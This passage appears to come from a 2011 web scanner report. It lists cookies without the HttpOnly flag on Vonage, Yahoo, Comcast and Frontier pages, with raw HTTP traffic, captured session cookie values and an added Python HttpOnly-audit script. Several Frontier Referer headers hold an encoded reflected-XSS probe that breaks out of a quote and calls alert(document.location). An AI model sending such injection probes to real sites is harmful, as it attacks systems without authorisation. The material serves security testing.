Set-Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; Version=1; Domain=.vonage.com; Max-Age=31536000; Expires=Wed, 05-Sep-2012 11:50:14 GMT; Path=/
Content-Length: 0


10.45. http://external.dmtracker.com/tags/vs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.dmtracker.com
Path:   /tags/vs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: v1st. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tags/vs.js HTTP/1.1
Host: external.dmtracker.com
Proxy-Connection: keep-alive
Referer: http://servicetips.whitefence.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 5215
Content-Type: application/x-javascript
Last-Modified: Wed, 27 Jan 2010 20:03:11 GMT
Accept-Ranges: bytes
ETag: "80e95bc08b9fca1:662"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="ALL DSP LAW PSA ADM DEV TAI IVA HIS OUR IND"
X-Powered-By: ASP.NET
Set-Cookie: v1st=585D1ECA0A35F6F3; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.dmtracker.com
Date: Tue, 06 Sep 2011 11:59:35 GMT
Connection: close

//Version: JT02
//V1 of Instrumentation Toolkit Addition
//Staging version with staging sensors

var _JT=new Object();
_JT.protocol=location.protocol;//override "https:"
_JT.v="JT01.02";
_JT.ns
...[SNIP]...

10.46. http://finance.yahoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: finbeta. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:44:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: finbeta=fp-bkt_o; expires=Wed, 07-Sep-2011 12:44:52 GMT; path=/; domain=finance.yahoo.com
Location: http://finance.yahoo.com/
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 89

<!-- xsltm25.finance.sp2.yahoo.com uncompressed/chunked Tue Sep 6 05:44:52 PDT 2011 -->

10.47. http://finance.yahoo.com/q

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /q

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: PRF. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. The value (&t=XSS.F) echoes the s query parameter from the request, so this is a ticker-preference cookie populated from user-supplied input.

Request

GET /q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Set-Cookie: PRF=&t=XSS.F; expires=Fri, 03 Sep 2021 05:48:15 GMT; path=/; domain=finance.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 51214

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>XSS.F: S
...[SNIP]...

10.48. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: VISITORID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331687930%3B%20gpv_07%3Dlocalization%2520-%2520shop%7C1315331688369%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:12 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 119084
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

10.49. http://forums.comcast.com/t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: VISITORID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; LiSESSIONID=52B4547347B0428CE9D783866B22AFED

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:13 GMT; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Tue, 06 Sep 2011 12:24:55 GMT
Expires: Wed, 05 Sep 2012 12:24:55 GMT
Content-Length: 4621
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.LYY.d.Y..sN...........1..I.X.D,B."...    G...\pa$..O.!!q....    ..\p.B .9......x<.........r.o.y...P-MWW..]..y.......C%C.C.D.e.
...[SNIP]...

10.50. http://forums.comcast.com/t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.comcast.com
Path:   /t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: VISITORID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function. Note that the same response sets the LiSESSIONID session cookie with HttpOnly and expires LithiumUserInfo; only VISITORID, a persistent visitor identifier scoped to .comcast.com, lacks the flag.

Request

GET /t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36?v=mpbl-1 HTTP/1.1
Host: forums.comcast.com
Proxy-Connection: keep-alive
Referer: http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; mbox=session#1315327839174-766376#1315331754|PC#1315327839174-766376.19#1316539494|check#true#1315329954; fsr.a=1315329894622; fsr.s={"v":1,"pv":7,"lc":{"d0":{"v":7,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331694799%3B%20gpv_07%3Dcorporate%2520-%2520learn%2520-%2520xfinity%2520-%2520wireless-mobile-broadband%2520%7C1315331694819%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; VISITORID=2086762009; LiSESSIONID=52B4547347B0428CE9D783866B22AFED

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Set-Cookie: LiSESSIONID=52B4547347B0428CE9D783866B22AFED; Path=/; HttpOnly
Set-Cookie: VISITORID=2086762009; Domain=.comcast.com; Expires=Sat, 06-Sep-2014 05:51:13 GMT; Path=/
Set-Cookie: LithiumUserInfo=""; Domain=.comcast.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Fri, 11 Mar 2011 08:18:50 GMT
Expires: Wed, 05 Sep 2012 12:24:55 GMT
Content-Length: 1238
Connection: close
Content-Type: image/jpeg;charset=UTF-8

[binary JPEG image body, 1238 bytes per Content-Length; not reproduced]
...[SNIP]...

10.51. http://frontier.com/AgentOrdering/customAppTabInfo/docobj.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/docobj.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AgentOrdering/customAppTabInfo/docobj.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 669
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

function getDocObj(elem,parent){
if(document.layers)
{
   if(parent){
       return "document."+parent+".document."+elem;
   }
   else{
       return "document."+elem;
   }
}
else if(document.all){
       return
...[SNIP]...
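The check behind every finding in this section is the same, so it is worth seeing it as code. The script below is an added example, not part of the scanner output or of frontier.com's code: it pulls every Set-Cookie header out of a raw HTTP response, tests for the HttpOnly attribute, and applies a name-based heuristic for whether the cookie looks like a session token, which is what separates an "Information" rating from a "Low" one in this report. The sample response is constructed to mirror the shape of issue 10.56 (an ARPT cookie without HttpOnly next to an ASP.NET_SessionId cookie with it); its cookie values are made up, and the name fragments in SESSION_NAME_RE are an assumption, not the scanner's own list.

```python
"""Audit Set-Cookie headers in a raw HTTP response for the HttpOnly flag.

Added example; not part of the scanner report. The sample response is
constructed and its cookie values are illustrative, not captured traffic.
"""
import re

# Assumption: names containing these fragments usually carry a session or
# authentication token. A heuristic, not a definitive classifier.
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth|login", re.IGNORECASE)


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, attributes).

    Attribute names are lower-cased; bare flags such as HttpOnly and
    Secure map to an empty string so 'httponly' in attrs is the test.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def set_cookie_values(raw_response):
    """Return every Set-Cookie header value from a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if line.lower().startswith("set-cookie:"):
            values.append(line.split(":", 1)[1].strip())
    return values


def looks_like_session_token(name):
    """Name-based guess at whether the cookie carries a session token."""
    return SESSION_NAME_RE.search(name) is not None


def rate(cookie):
    """Severity on the report's own scale; None means no finding."""
    if cookie["httponly"]:
        return None
    return "Low" if cookie["session_like"] else "Information"


def audit_response(raw_response):
    """Return one record per cookie set by the response, in header order."""
    findings = []
    for header_value in set_cookie_values(raw_response):
        name, value, attrs = parse_set_cookie(header_value)
        record = {
            "cookie": name,
            "httponly": "httponly" in attrs,
            "secure": "secure" in attrs,
            "samesite": attrs.get("samesite"),
            "session_like": looks_like_session_token(name),
        }
        record["severity"] = rate(record)
        findings.append(record)
    return findings


# Constructed sample modelled on issue 10.56 (cookie values are made up).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: ARPT=EXAMPLEVALUE0001; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/\r\n"
    "Date: Tue, 06 Sep 2011 12:03:52 GMT\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Set-Cookie: ASP.NET_SessionId=exampleidexampleid; path=/; HttpOnly\r\n"
    "Content-Type: text/css; charset=utf-8\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for record in audit_response(SAMPLE_RESPONSE):
        verdict = record["severity"] or "ok"
        print(f"{record['cookie']:20} HttpOnly={record['httponly']!s:5} "
              f"session_like={record['session_like']!s:5} -> {verdict}")
```

Two caveats a reviewer of these findings should keep in mind. First, in the frontier.com responses the ASP.NET_SessionId cookie already carries HttpOnly while ARPT does not, so the ASP.NET web.config setting `<httpCookies httpOnlyCookies="true" />` will not help: it only affects cookies that ASP.NET itself issues, and ARPT has to be fixed wherever it is set. Second, HttpOnly only stops script from reading the cookie; a reflected XSS such as the probe visible in the Referer headers of these requests can still drive authenticated requests from the victim's browser, so the flag reduces the impact of the XSS in the HEAD of this report, it does not remove it.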

10.52. http://frontier.com/AgentOrdering/customAppTabInfo/tabNavigation.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/tabNavigation.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AgentOrdering/customAppTabInfo/tabNavigation.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 4570
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

/* ********************************************************************************
CREATED 05/05 AXG987 per ER Rqst 10855

The file, tabNavigation.js, contains the JavaScript that makes the tab na
...[SNIP]...

10.53. http://frontier.com/AgentOrdering/customAppTabInfo/tabSetup.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/customAppTabInfo/tabSetup.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AgentOrdering/customAppTabInfo/tabSetup.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 2645
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

/* ********************************************************************************
CREATED 06/06 AXG987

*********************************************************************************** */


...[SNIP]...

10.54. http://frontier.com/AgentOrdering/javascripts/AgentOrdering.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/javascripts/AgentOrdering.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AgentOrdering/javascripts/AgentOrdering.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8823CMWUY; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 339
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:a39"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:03:50 GMT

function AdvanceCursorByLengthChk(thisForm, presentObj, moveToName, maxLgth)
{
   if (presentObj.value.length == maxLgth)
   {
       setFocusToObj(thisForm, moveToName);
       return;
   }
}

function setF
...[SNIP]...

10.55. http://frontier.com/AgentOrdering/javascripts/validateinteger.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/javascripts/validateinteger.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AgentOrdering/javascripts/validateinteger.js HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.19T0x0000000e_0xc7da8823CMWWU; expires=Thu, 6-Sep-2012 12:03:43 GMT; path=/
Content-Length: 220
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Mar 2010 19:40:42 GMT
Accept-Ranges: bytes
ETag: "0d92993d2bbca1:51c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:01:04 GMT

function Int_Function(theItem) {
   num_test = /\d/;
   for (i=0;i<theItem.value.length;i++) {
       if (!(num_test.test(theItem.value.charAt(i)))) {
           theItem.value = theItem.value.substring(0,i);
           r
...[SNIP]...

10.56. http://frontier.com/Controls/VirtualCode.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARPT (the first Set-Cookie header in the response below; the ASP.NET_SessionId cookie in the same response does carry HttpOnly). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Controls/VirtualCode.ashx?pageid=97&origPath=%2fNewStyleSheet.css%2f HTTP/1.1
Host: frontier.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://frontier.com/AgentOrdering72d0c%2527%253balert%2528document.location%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da8824CMWUL; expires=Thu, 6-Sep-2012 12:03:48 GMT; path=/
Date: Tue, 06 Sep 2011 12:03:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=55lskvumgowh0r45t52u43vf; path=/; HttpOnly
Cache-Control: public
Expires: Tue, 06 Sep 2011 12:14:22 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 22788

#iframeDiv {

}

#iframeDiv iframe {
width: 900px;
height: 1000px;
border: none;
overflow: auto;
}

body
{
MARGIN-TOP: 0px;
MARGIN-LEFT: 0px;
CO
...[SNIP]...

10.57. http://frontier.com/Js/formHelpers.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /Js/formHelpers.js

Issue detail

